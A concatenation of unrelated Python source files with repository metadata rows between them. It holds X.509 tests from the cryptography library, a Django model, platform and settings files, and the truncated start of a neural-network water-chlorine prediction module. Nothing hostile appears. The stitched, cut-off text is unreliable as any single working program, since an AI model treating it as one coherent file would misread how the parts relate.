b"e3076301006072a8648ce3d020106052b8104002203620004de19b514c0b3c3"
b"ae9b398ea3e26b5e816bdcf9102cad8f12fe02f9e4c9248724b39297ed7582e"
b"04d8b32a551038d09086803a6d3fb91a1a1167ec02158b00efad39c9396462f"
b"accff0ffaf7155812909d3726bd59fde001cff4bb9b2f5af8cbaa000"
)
request.public_key().verify(
request.signature, request.tbs_certrequest_bytes,
ec.ECDSA(request.signature_hash_algorithm)
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestOtherCertificate(object):
def test_unsupported_subject_public_key_info(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom", "unsupported_subject_public_key_info.pem"
),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError):
cert.public_key()
def test_bad_time_in_validity(self, backend):
cert = _load_cert(
os.path.join(
"x509", "badasn1time.pem"
),
x509.load_pem_x509_certificate,
backend,
)
with pytest.raises(ValueError, match='19020701025736Z'):
cert.not_valid_after
class TestNameAttribute(object):
EXPECTED_TYPES = [
(NameOID.COMMON_NAME, _ASN1Type.UTF8String),
(NameOID.COUNTRY_NAME, _ASN1Type.PrintableString),
(NameOID.LOCALITY_NAME, _ASN1Type.UTF8String),
(NameOID.STATE_OR_PROVINCE_NAME, _ASN1Type.UTF8String),
(NameOID.STREET_ADDRESS, _ASN1Type.UTF8String),
(NameOID.ORGANIZATION_NAME, _ASN1Type.UTF8String),
(NameOID.ORGANIZATIONAL_UNIT_NAME, _ASN1Type.UTF8String),
(NameOID.SERIAL_NUMBER, _ASN1Type.PrintableString),
(NameOID.SURNAME, _ASN1Type.UTF8String),
(NameOID.GIVEN_NAME, _ASN1Type.UTF8String),
(NameOID.TITLE, _ASN1Type.UTF8String),
(NameOID.GENERATION_QUALIFIER, _ASN1Type.UTF8String),
(NameOID.X500_UNIQUE_IDENTIFIER, _ASN1Type.UTF8String),
(NameOID.DN_QUALIFIER, _ASN1Type.PrintableString),
(NameOID.PSEUDONYM, _ASN1Type.UTF8String),
(NameOID.USER_ID, _ASN1Type.UTF8String),
(NameOID.DOMAIN_COMPONENT, _ASN1Type.IA5String),
(NameOID.EMAIL_ADDRESS, _ASN1Type.IA5String),
(NameOID.JURISDICTION_COUNTRY_NAME, _ASN1Type.PrintableString),
(NameOID.JURISDICTION_LOCALITY_NAME, _ASN1Type.UTF8String),
(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME,
_ASN1Type.UTF8String
),
(NameOID.BUSINESS_CATEGORY, _ASN1Type.UTF8String),
(NameOID.POSTAL_ADDRESS, _ASN1Type.UTF8String),
(NameOID.POSTAL_CODE, _ASN1Type.UTF8String),
]
def test_default_types(self):
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
na = x509.NameAttribute(oid, u"US")
assert na._type == asn1_type
def test_alternate_type(self):
na2 = x509.NameAttribute(
NameOID.COMMON_NAME, u"common", _ASN1Type.IA5String
)
assert na2._type == _ASN1Type.IA5String
def test_init_bad_oid(self):
with pytest.raises(TypeError):
x509.NameAttribute(None, u'value')
def test_init_bad_value(self):
with pytest.raises(TypeError):
x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'),
b'bytes'
)
def test_init_none_value(self):
with pytest.raises(TypeError):
x509.NameAttribute(NameOID.ORGANIZATION_NAME, None)
def test_init_bad_country_code_value(self):
with pytest.raises(ValueError):
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u'United States'
)
# unicode string of length 2, but > 2 bytes
with pytest.raises(ValueError):
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u'\U0001F37A\U0001F37A'
)
def test_invalid_type(self):
with pytest.raises(TypeError):
x509.NameAttribute(NameOID.COMMON_NAME, u"common", "notanenum")
def test_eq(self):
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
) == x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
)
def test_ne(self):
assert x509.NameAttribute(
x509.ObjectIdentifier('2.5.4.3'), u'value'
) != x509.NameAttribute(
x509.ObjectIdentifier('2.5.4.5'), u'value'
)
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value'
) != x509.NameAttribute(
x509.ObjectIdentifier('2.999.1'), u'value2'
)
assert x509.NameAttribute(
x509.ObjectIdentifier('2.999.2'), u'value'
) != object()
def test_repr(self):
na = x509.NameAttribute(x509.ObjectIdentifier('2.5.4.3'), u'value')
if not six.PY2:
assert repr(na) == (
"<NameAttribute(oid=<ObjectIdentifier(oid=2.5.4.3, name=commo"
"nName)>, value='value')>"
)
else:
assert repr(na) == (
"<NameAttribute(oid=<ObjectIdentifier(oid=2.5.4.3, name=commo"
"nName)>, value=u'value')>"
)
def test_distinugished_name(self):
# Escaping
na = x509.NameAttribute(NameOID.COMMON_NAME, u'James "Jim" Smith, III')
assert na.rfc4514_string() == r'CN=James \"Jim\" Smith\, III'
na = x509.NameAttribute(NameOID.USER_ID, u'# escape+,;\0this ')
assert na.rfc4514_string() == r'UID=\# escape\+\,\;\00this\ '
# Nonstandard attribute OID
na = x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'somebody@example.com')
assert (na.rfc4514_string() ==
'1.2.840.113549.1.9.1=somebody@example.com')
def test_empty_value(self):
na = x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'')
assert na.rfc4514_string() == r'ST='
class TestRelativeDistinguishedName(object):
def test_init_empty(self):
with pytest.raises(ValueError):
x509.RelativeDistinguishedName([])
def test_init_not_nameattribute(self):
with pytest.raises(TypeError):
x509.RelativeDistinguishedName(["not-a-NameAttribute"])
def test_init_duplicate_attribute(self):
with pytest.raises(ValueError):
x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'val1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'val1'),
])
def test_hash(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
])
rdn3 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value3'),
])
assert hash(rdn1) == hash(rdn2)
assert hash(rdn1) != hash(rdn3)
def test_eq(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
])
assert rdn1 == rdn2
def test_ne(self):
rdn1 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2'),
])
rdn2 = x509.RelativeDistinguishedName([
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value3'),
])
assert rdn1 != rdn2
assert rdn1 != object()
def test_iter_input(self):
# Order must be preserved too
attrs = [
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value2'),
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value3')
]
rdn = x509.RelativeDistinguishedName(iter(attrs))
assert list(rdn) == attrs
assert list(rdn) == attrs
def test_get_attributes_for_oid(self):
oid = x509.ObjectIdentifier('2.999.1')
attr = x509.NameAttribute(oid, u'value1')
rdn = x509.RelativeDistinguishedName([attr])
assert rdn.get_attributes_for_oid(oid) == [attr]
assert rdn.get_attributes_for_oid(x509.ObjectIdentifier('1.2.3')) == []
class TestObjectIdentifier(object):
def test_eq(self):
oid1 = x509.ObjectIdentifier('2.999.1')
oid2 = x509.ObjectIdentifier('2.999.1')
assert oid1 == oid2
def test_ne(self):
oid1 = x509.ObjectIdentifier('2.999.1')
assert oid1 != x509.ObjectIdentifier('2.999.2')
assert oid1 != object()
def test_repr(self):
oid = x509.ObjectIdentifier("2.5.4.3")
assert repr(oid) == "<ObjectIdentifier(oid=2.5.4.3, name=commonName)>"
oid = x509.ObjectIdentifier("2.999.1")
assert repr(oid) == "<ObjectIdentifier(oid=2.999.1, name=Unknown OID)>"
def test_name_property(self):
oid = x509.ObjectIdentifier("2.5.4.3")
assert oid._name == 'commonName'
oid = x509.ObjectIdentifier("2.999.1")
assert oid._name == 'Unknown OID'
def test_too_short(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("1")
def test_invalid_input(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("notavalidform")
def test_invalid_node1(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("7.1.37")
def test_invalid_node2(self):
with pytest.raises(ValueError):
x509.ObjectIdentifier("1.50.200")
def test_valid(self):
x509.ObjectIdentifier("0.35.200")
x509.ObjectIdentifier("1.39.999")
x509.ObjectIdentifier("2.5.29.3")
x509.ObjectIdentifier("2.999.37.5.22.8")
x509.ObjectIdentifier("2.25.305821105408246119474742976030998643995")
class TestName(object):
def test_eq(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([
x509.RelativeDistinguishedName([ava1]),
x509.RelativeDistinguishedName([ava2]),
])
name3 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
name4 = x509.Name([x509.RelativeDistinguishedName([ava2, ava1])])
assert name1 == name2
assert name3 == name4
def test_ne(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([ava2, ava1])
name3 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
assert name1 != name2
assert name1 != name3
assert name1 != object()
def test_hash(self):
ava1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
ava2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([ava1, ava2])
name2 = x509.Name([
x509.RelativeDistinguishedName([ava1]),
x509.RelativeDistinguishedName([ava2]),
])
name3 = x509.Name([ava2, ava1])
name4 = x509.Name([x509.RelativeDistinguishedName([ava1, ava2])])
name5 = x509.Name([x509.RelativeDistinguishedName([ava2, ava1])])
assert hash(name1) == hash(name2)
assert hash(name1) != hash(name3)
assert hash(name1) != hash(name4)
assert hash(name4) == hash(name5)
def test_iter_input(self):
attrs = [
x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
]
name = x509.Name(iter(attrs))
assert list(name) == attrs
assert list(name) == attrs
def test_rdns(self):
rdn1 = x509.NameAttribute(x509.ObjectIdentifier('2.999.1'), u'value1')
rdn2 = x509.NameAttribute(x509.ObjectIdentifier('2.999.2'), u'value2')
name1 = x509.Name([rdn1, rdn2])
assert name1.rdns == [
x509.RelativeDistinguishedName([rdn1]),
x509.RelativeDistinguishedName([rdn2]),
]
name2 = x509.Name([x509.RelativeDistinguishedName([rdn1, rdn2])])
assert name2.rdns == [x509.RelativeDistinguishedName([rdn1, rdn2])]
@pytest.mark.parametrize(
("common_name", "org_name", "expected_repr"),
[
(
u'cryptography.io',
u'PyCA',
"<Name(CN=cryptography.io,O=PyCA)>",
),
(
u'Certificación',
u'Certificación',
"<Name(CN=Certificación,O=Certificación)>",
),
])
def test_repr(self, common_name, org_name, expected_repr):
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, common_name),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, org_name),
])
assert repr(name) == expected_repr
def test_rfc4514_string(self):
n = x509.Name([
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'net'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'example'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'Sales'),
x509.NameAttribute(NameOID.COMMON_NAME, u'J. Smith'),
]),
])
assert (n.rfc4514_string() ==
'OU=Sales+CN=J. Smith,DC=example,DC=net')
def test_rfc4514_string_empty_values(self):
n = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u''),
x509.NameAttribute(NameOID.LOCALITY_NAME, u''),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])
assert (n.rfc4514_string() == 'CN=cryptography.io,O=PyCA,L=,ST=,C=US')
def test_not_nameattribute(self):
with pytest.raises(TypeError):
x509.Name(["not-a-NameAttribute"])
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_bytes(self, backend):
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30293118301606035504030c0f63727970746f6772617068792e696f310d300"
b"b060355040a0c0450794341"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_bmpstring_bytes(self, backend):
# For this test we need an odd length string. BMPString is UCS-2
# encoded so it will always be even length and OpenSSL will error if
# you pass an odd length string without encoding it properly first.
name = x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME,
u'cryptography.io',
_ASN1Type.BMPString
),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30383127302506035504031e1e00630072007900700074006f00670072006100"
b"7000680079002e0069006f310d300b060355040a0c0450794341"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_universalstring_bytes(self, backend):
# UniversalString is UCS-4
name = x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME,
u'cryptography.io',
_ASN1Type.UniversalString
),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
assert name.public_bytes(backend) == binascii.unhexlify(
b"30563145304306035504031c3c00000063000000720000007900000070000000"
b"740000006f000000670000007200000061000000700000006800000079000000"
b"2e000000690000006f310d300b060355040a0c0450794341"
)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestEd25519Certificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "ed25519", "root-ed25519.pem"),
x509.load_pem_x509_certificate,
backend
)
# self-signed, so this will work
cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 9579446940964433301
assert cert.signature_hash_algorithm is None
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED25519
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestEd448Certificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "ed448", "root-ed448.pem"),
x509.load_pem_x509_certificate,
backend
)
# self-signed, so this will work
cert.public_key().verify(cert.signature, cert.tbs_certificate_bytes)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 448
assert cert.signature_hash_algorithm is None
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED448
def test_random_serial_number(monkeypatch):
sample_data = os.urandom(20)
def notrandom(size):
assert size == len(sample_data)
return sample_data
monkeypatch.setattr(os, "urandom", notrandom)
serial_number = x509.random_serial_number()
assert (
serial_number == utils.int_from_bytes(sample_data, "big") >> 1
)
assert serial_number.bit_length() < 160
| 39.992327 | 79 | 0.625925 | 18,536 | 187,644 | 6.090742 | 0.059236 | 0.053606 | 0.065475 | 0.028769 | 0.76818 | 0.74004 | 0.712891 | 0.677328 | 0.641597 | 0.61157 | 0 | 0.121358 | 0.280084 | 187,644 | 4,691 | 80 | 40.000853 | 0.714379 | 0.011527 | 0 | 0.62299 | 0 | 0.00072 | 0.117261 | 0.074783 | 0 | 0 | 0 | 0 | 0.092633 | 1 | 0.055916 | false | 0.00024 | 0.00552 | 0 | 0.067675 | 0.00384 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c6fb68062cf367ed6e9e36afe007ca0ca5f2f0c | 866 | py | Python | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | evewspace/Teamspeak/default_settings.py | gpapaz/eve-wspace | 6b46d120c5ca8d27546113f51fd74fd7797dcbfc | [
"Apache-2.0"
] | null | null | null | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from core.models import ConfigEntry
from Teamspeak.models import TeamspeakServer
from core.utils import get_config
def load_defaults():
ts3 = TeamspeakServer.create("localhost", "baduser","badpass","10011", "9887")
ts3.save()
| 37.652174 | 82 | 0.743649 | 124 | 866 | 5.177419 | 0.709677 | 0.093458 | 0.040498 | 0.049844 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026761 | 0.180139 | 866 | 22 | 83 | 39.363636 | 0.877465 | 0.691686 | 0 | 0 | 0 | 0 | 0.128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.5 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 3 |
7c7361013f3a7b9971368dc2c25a05418213cbf7 | 29 | py | Python | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | UnitTests/__init__.py | YuriShporhun/YBio | 420e1fa8c8d0d56bfb6e56f1afcf277c73f1d968 | [
"Apache-2.0"
] | null | null | null | __author__ = 'Yuri Shporhun'
| 14.5 | 28 | 0.758621 | 3 | 29 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0.448276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c7a35ec575fe9f29dac44ba63baf9dd56d48655 | 1,057 | py | Python | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 8 | 2020-12-13T09:36:43.000Z | 2022-03-31T23:35:31.000Z | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 39 | 2020-10-02T15:56:55.000Z | 2022-01-19T11:58:41.000Z | response/core/models/user_external.py | dgzlopes/response | 2e8d6d1110cdac302a3552b66f33d439dea37a7b | [
"MIT"
] | 3 | 2020-10-30T19:46:31.000Z | 2021-05-14T04:59:39.000Z | from django.contrib.auth.models import User
from django.db import models
class ExternalUserManager(models.Manager):
def get_or_create_slack(self, *args, **kwargs):
return self.get_or_create(app_id="slack", *args, **kwargs)
def update_or_create_slack(self, *args, **kwargs):
return self.update_or_create(app_id="slack", *args, **kwargs)
class ExternalUser(models.Model):
class Meta:
unique_together = ("owner", "app_id", "external_id")
owner = models.ForeignKey(User, on_delete=models.PROTECT, null=True, blank=True)
app_id = models.CharField(max_length=50, blank=False, null=False)
external_id = models.CharField(max_length=50, blank=False, null=False)
display_name = models.CharField(max_length=50, blank=False, null=False)
full_name = models.CharField(max_length=50, blank=True, null=True)
email = models.CharField(max_length=100, blank=True, null=True)
objects = ExternalUserManager()
def __str__(self):
return f"{self.display_name or self.external_id} ({self.app_id})"
| 37.75 | 84 | 0.720908 | 148 | 1,057 | 4.932432 | 0.337838 | 0.034247 | 0.123288 | 0.164384 | 0.421918 | 0.421918 | 0.421918 | 0.291781 | 0.190411 | 0.128767 | 0 | 0.012263 | 0.151372 | 1,057 | 27 | 85 | 39.148148 | 0.801561 | 0 | 0 | 0 | 0 | 0 | 0.082308 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.105263 | 0.157895 | 0.947368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
7c7c81414791a11a686c1db3350b4387ca49624e | 512 | py | Python | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | 2 | 2021-11-28T11:13:07.000Z | 2022-02-02T02:26:47.000Z | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | 4 | 2022-01-04T22:22:09.000Z | 2022-01-21T06:44:03.000Z | tests/system/test_platform.py | paulocoutinhox/pygemstones | 79397ee187670dc78746a3b3f64ca6118cd3a86c | [
"MIT"
] | null | null | null | import pygemstones.system.platform as p
# -----------------------------------------------------------------------------
def test_windows():
ret = p.is_windows()
assert isinstance(ret, bool)
# -----------------------------------------------------------------------------
def test_linux():
ret = p.is_linux()
assert isinstance(ret, bool)
# -----------------------------------------------------------------------------
def test_macos():
ret = p.is_macos()
assert isinstance(ret, bool)
| 25.6 | 79 | 0.355469 | 39 | 512 | 4.512821 | 0.410256 | 0.119318 | 0.102273 | 0.392045 | 0.340909 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 512 | 19 | 80 | 26.947368 | 0.392857 | 0.455078 | 0 | 0.3 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.3 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7cb5de8677ae5ad6a1057d991768a49b492ffbc5 | 519 | py | Python | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 13 | 2017-08-15T15:50:13.000Z | 2019-06-03T10:24:50.000Z | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 3 | 2017-08-29T16:35:04.000Z | 2021-06-01T23:49:16.000Z | ultron/actions/__init__.py | Prakash2403/ultron | 7d1067eb98ef52f6a88299534ea204e7ae45d7a7 | [
"MIT"
] | 4 | 2017-08-16T09:33:59.000Z | 2019-06-05T07:25:30.000Z | """
The base class for all actions.
For defining a new action, inherit this class, then define all the associated methods.
"""
from abc import abstractmethod, ABC
class Action(ABC):
@abstractmethod
def execute(self, *args, **kwargs):
return
@abstractmethod
def post_execute(self, *args, **kwargs):
return
@abstractmethod
def pre_execute(self, *args, **kwargs):
return
def run(self):
self.pre_execute()
self.execute()
self.post_execute()
| 19.961538 | 86 | 0.639692 | 62 | 519 | 5.290323 | 0.467742 | 0.167683 | 0.137195 | 0.192073 | 0.35061 | 0.268293 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0.258189 | 519 | 25 | 87 | 20.76 | 0.851948 | 0.22736 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.066667 | 0.2 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
7cba2cd283da139416a5e9b54e91d7ae58a1f4e5 | 143,685 | py | Python | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | swotann/nnetwork.py | dighr/swot-webapp | 17f738a1e9f0e11b9fe9625ddd8c9533d5f36e8f | [
"MIT"
] | null | null | null | import base64
import datetime
import io
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from xlrd.xldate import xldate_as_datetime
from yattag import Doc
plt.rcParams.update({"figure.autolayout": True})
import matplotlib.gridspec as gridspec
import pandas as pd
import scipy.stats
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
import logging
"""
TF_CPP_MIN_LOG_LEVEL:
Defaults to 0, so all logs are shown. Set TF_CPP_MIN_LOG_LEVEL to 1 to filter out INFO logs, 2 to additionally filter out WARNING, 3 to additionally filter out ERROR.
"""
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
from tensorflow import keras
class NNetwork(object):
def __init__(self, network_count=200, epochs=1000):
logging.getLogger().setLevel(logging.INFO)
self.xl_dateformat = r"%Y-%m-%dT%H:%M"
self.model = None
self.pretrained_networks = []
self.software_version = "2.0.1"
self.input_filename = None
self.today = str(datetime.date.today())
self.avg_time_elapsed = 0
self.predictors_scaler = MinMaxScaler(feature_range=(-1, 1))
self.targets_scaler = MinMaxScaler(feature_range=(-1, 1))
self.history = None
self.file = None
self.skipped_rows = []
self.ruleset = []
self.layer1_neurons = 12
self.network_count = network_count
self.epochs = epochs
self.predictors = None
self.targets = None
self.predictions = None
self.avg_case_results_am = None
self.avg_case_results_pm = None
self.worst_case_results_am = None
self.worst_case_results_pm = None
self.WB_bandwidth = None
self.post_process_check = False # Is post-processed better than raw. If False, uses raw results, if true, uses post-processed results
self.optimizer = keras.optimizers.Nadam(lr=0.01, beta_1=0.9, beta_2=0.999)
self.model = keras.models.Sequential()
self.model.add(
keras.layers.Dense(self.layer1_neurons, input_dim=5, activation="tanh")
)
self.model.add(keras.layers.Dense(1, activation="linear"))
self.model.compile(loss="mse", optimizer=self.optimizer, metrics=["mse"])
def import_data_from_csv(self, filename):
"""
Imports data to the network by a comma-separated values (CSV) file.
Load data to a network that are stored in .csv file format.
The data loaded from this method can be used both for training reasons as
well as to make predictions.
:param filename: String containing the filename of the .csv file containing the input data (e.g "input_data.csv")
"""
df = pd.read_csv(filename)
self.file = df.copy()
global FRC_IN
global FRC_OUT
global WATTEMP
global COND
# Locate the fields used as inputs/predictors and outputs in the loaded file
# and split them
if "se1_frc" in self.file.columns:
FRC_IN = "se1_frc"
WATTEMP = "se1_wattemp"
COND = "se1_cond"
FRC_OUT = "se4_frc"
elif "ts_frc1" in self.file.columns:
FRC_IN = "ts_frc1"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc1"
elif "ts_frc" in self.file.columns:
FRC_IN = "ts_frc"
WATTEMP = "ts_wattemp"
COND = "ts_cond"
FRC_OUT = "hh_frc"
# Standardize the DataFrame by specifying rules
# To add a new rule, call the method execute_rule with the parameters (description, affected_column, query)
self.execute_rule("Invalid tapstand FRC", FRC_IN, self.file[FRC_IN].isnull())
self.execute_rule("Invalid household FRC", FRC_OUT, self.file[FRC_OUT].isnull())
self.execute_rule(
"Invalid tapstand date/time",
"ts_datetime",
